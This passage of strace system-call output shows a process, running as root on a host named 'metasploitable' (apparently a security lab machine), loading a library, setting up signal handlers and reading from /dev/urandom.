\4\0\0\0\0\0\0\0\0\0\0\0\0\0\0\22\0\0\0\23\0\0\0\24\0\0\0\0\0\0\0\25\0\0\0\26\0\0\0\0\0\0\0\27\0\0\0\0\0\0\0\30\0\0\0\31\0\0\0\0\0\0\0k\31Qj\233(\375B\233`\205\33\327\16?\17I->\333\235C\r\375\313\373_\22\325=l\366\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0o\0\0\0\0\0\0\0\35\0\0\0\22\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0 \0\0\0\37\0\0\0\0\0\0\0", 512) = 512

10436 07:33:00.009612 fstat64(1, {st_mode=S_IFREG|0644, st_size=38300, ...}) = 0

10436 07:33:00.009629 mmap2(NULL, 201052, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d2d000

10436 07:33:00.009640 mmap2(0xb7d36000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d36000

10436 07:33:00.009654 mmap2(0xb7d38000, 155996, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d38000

10436 07:33:00.009668 close(1)          = 0

10436 07:33:00.009691 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d2c000

10436 07:33:00.009704 set_thread_area({entry_number:-1 -> 6, base_addr:0xb7d2c8c0, limit:1048575, seg_32bit:1, contents:0, read_exec_only:0, limit_in_pages:1, seg_not_present:0, useable:1}) = 0

10436 07:33:00.009763 mprotect(0xb7ea8000, 4096, PROT_READ) = 0

10436 07:33:00.009789 munmap(0xb7ef0000, 29913) = 0

10436 07:33:00.009801 set_tid_address(0xb7d2c908) = 10436

10436 07:33:00.009811 set_robust_list(0xb7d2c910, 0xc) = 0

10436 07:33:00.009820 futex(0xbf84ecf0, 0x81 /* FUTEX_??? */, 1) = 0

10436 07:33:00.009866 rt_sigaction(SIGRTMIN, {0xb7eb22c0, [], SA_SIGINFO}, NULL, 8) = 0

10436 07:33:00.009893 rt_sigaction(SIGRT_1, {0xb7eb2340, [], SA_RESTART|SA_SIGINFO}, NULL, 8) = 0

10436 07:33:00.009906 rt_sigprocmask(SIG_UNBLOCK, [RTMIN RT_1], NULL, 8) = 0

10436 07:33:00.009919 getrlimit(RLIMIT_STACK, {rlim_cur=8192*1024, rlim_max=RLIM_INFINITY}) = 0

10436 07:33:00.009938 uname({sys="Linux", node="metasploitable", ...}) = 0

10436 07:33:00.009986 rt_sigaction(SIGFPE, {SIG_IGN}, {SIG_DFL}, 8) = 0

10436 07:33:00.010031 brk(0)            = 0x8153000

10436 07:33:00.010041 brk(0x8174000)    = 0x8174000

10436 07:33:00.010083 getuid32()        = 0

10436 07:33:00.010093 geteuid32()       = 0

10436 07:33:00.010102 getgid32()        = 0

10436 07:33:00.010111 getegid32()       = 0

10436 07:33:00.010147 mmap2(NULL, 135168, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7d0b000

10436 07:33:00.010173 open("/dev/urandom", O_RDONLY|O_LARGEFILE) = 1

10436 07:33:00.010190 read(1, "\214u\1p", 4) = 4

